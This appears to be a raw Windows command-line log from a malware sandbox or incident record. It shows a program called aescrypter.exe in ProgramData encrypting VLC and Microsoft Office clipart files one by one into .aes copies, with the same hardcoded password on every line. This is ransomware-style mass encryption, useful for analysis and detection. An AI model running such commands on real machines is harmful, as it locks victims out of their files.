"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml.aes" "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\NEWS.txt.aes" "C:\Program Files\VideoLAN\VLC\NEWS.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\plugins\plugins.dat.aes" "C:\Program Files\VideoLAN\VLC\plugins\plugins.dat" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\README.txt.aes" "C:\Program Files\VideoLAN\VLC\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\skins\winamp2.xml.aes" "C:\Program Files\VideoLAN\VLC\skins\winamp2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\THANKS.txt.aes" "C:\Program Files\VideoLAN\VLC\THANKS.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099191.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101860.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
